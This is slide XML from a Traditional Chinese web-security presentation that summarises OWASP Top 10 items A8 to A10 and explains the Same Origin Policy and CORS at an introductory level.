            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="3473700"/>
            <a:ext cx="57513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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A8 Insecure Deserialization 不安全的反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680400" y="3795950"/>
            <a:ext cx="80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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不安全的反序列化漏洞主要是鎖定 Java、PHP 或 Node.js 等常見的平臺</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="4196150"/>
            <a:ext cx="68799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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9 Using Components with Known Vulnerabilities 使用已有漏洞的元件</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680400" y="4482575"/>
            <a:ext cx="80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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如果有一個容易受到攻擊的元件被駭客利用，就會導致使用這些元件的系統也有可能被駭客侵入。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449700" y="4882775"/>
            <a:ext cx="6879900" cy="37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b="1" lang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10 Insufficient Logging &amp; Monitoring 紀錄與監控不足風險</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;gf24b9b62fb_0_62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781275" y="5224400"/>
            <a:ext cx="682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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>大部分的攻擊都是有跡可循的，例如來自特定來源的失敗登錄嘗試太多或在沒有預期的情況下出現高峰流量等等。不要等發生事情才來處理，應該要平常就做好監控，系統出現可疑行為就要趕快處理</a:t>
            </a:r>
            <a:endParaRPr>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2411747" y="2924950"/>
            <a:ext cx="5596500" cy="397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2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>同源政策(Same Origin Policy)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>CORS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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475647" y="493575"/>
            <a:ext cx="6104700" cy="280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440"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>同源政策(Same Origin Policy)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475655" y="836712"/>
            <a:ext cx="4104600" cy="144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280"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138875" y="1043025"/>
            <a:ext cx="63294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zh-TW" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>簡單講就是，自己網站的資源不能被別人存取或修改。</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accent3"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138875" y="1523100"/>
            <a:ext cx="644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原因：這是基於網絡安全的考量，避免有駭客惡意呼叫其他人的網絡服務。若沒有這個政策保護，別人就可以任意修改和存取你網頁裏的資源了。</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136" name="Google Shape;136;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138875" y="2195925"/>
            <a:ext cx="6561674" cy="2310050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138875" y="4563200"/>
            <a:ext cx="750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t>同源政策並非完全禁止跨來源存取</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>但在某些情況下，即使兩個網站是「不同源」，也可以允許存取的。例如以下情況：</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>1.跨來源寫入(Cross-origin writes）(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>允許：表單送出(form)、連結(link)、重新導向(redirect))</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>2.跨來源嵌入(Cross-origin embedding)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ungyo Group">
  <a:themeElements>
    <a:clrScheme name="Chungyo Group CIS">
      <a:dk1>
        <a:srgbClr val="2A1511"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="BFCC00"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="8F9227"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3E4EB"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="909228"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="C0CC00"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="717171"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="FFFFFF"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFFFFF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FFFFFF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="C0CC00"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="8F92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